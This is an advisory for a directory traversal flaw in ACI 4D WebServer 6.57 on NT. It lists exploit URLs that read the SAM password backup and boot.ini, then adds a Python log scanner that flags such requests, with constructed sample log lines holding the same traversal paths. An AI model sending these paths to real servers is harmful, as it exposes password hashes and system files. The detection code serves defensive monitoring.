ACI 4D Webserver directory traversal



COMMAND

    ACI 4D WebServer

SYSTEMS AFFECTED

    ACI 4D WebServer 6.57 (at least)

PROBLEM

    'KF' found the following.  This directory traversal hole seems to
    work on ACI 4D WebServer running on the NT platform.  One would
    imagine exploitation on a Mac OS box would be similar but would
    require the proper Mac filesystem path to the file you wish to
    view.  Exploit:

        http://host + one of the following URLs:
        - /4DBin/_/C:/winnt/repair/sam._
        - /4DBin/_/../winnt/repair/sam._
        - /4DBin/_/C:/inetpub/../boot.ini
        - /4DBin/_/../boot.ini
        - /4DBin/_/../inetpub/../boot.ini

SOLUTION

    Nothing yet.
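
    With no fix available, requests of the form listed under PROBLEM can
    be picked out of web server access logs.  The Python below is an added
    example, not part of the original advisory.  It assumes the access log
    is in Common Log Format; the function names and the sample log lines
    are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path prefix taken from the advisory's example URLs (compared lowercased).
PREFIX = "/4dbin/_/"
# Assumption: access log is Common Log Format; this pulls out the request path.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def decode_fully(path, rounds=3):
    """Percent-decode repeatedly so a double-encoded '..' is still seen."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(path):
    """Return a reason string if the path matches the advisory's pattern, else None."""
    norm = decode_fully(path.split("?", 1)[0]).replace("\\", "/").lower()
    if not norm.startswith(PREFIX):
        return None
    rest = norm[len(PREFIX):]
    if re.match(r"[a-z]:", rest):
        return "drive-letter path"
    if ".." in rest.split("/"):
        return "parent-directory segment"
    return None


def scan(lines):
    """Yield (line_number, reason, raw_path) for each suspicious log line."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        reason = classify(m.group(1)) if m else None
        if reason:
            yield n, reason, m.group(1)


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /4DBin/_/../boot.ini HTTP/1.0" 200 190',
    '192.0.2.10 - - [01/Jan/2001:10:00:05 +0000] "GET /4DBin/_/C:/inetpub/../boot.ini HTTP/1.0" 200 190',
    '192.0.2.11 - - [01/Jan/2001:10:01:00 +0000] "GET /4DBin/_/%2e%2e/boot.ini HTTP/1.0" 404 0',
    '192.0.2.12 - - [01/Jan/2001:10:02:00 +0000] "GET /index.html HTTP/1.0" 200 512',
]

print(*scan(SAMPLE), sep="\n")
```

    A hit with a 200 status and a response size matching a system file
    is the case to investigate first; the same classify() check can sit
    in a reverse proxy rule to reject such requests before they reach
    the server.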

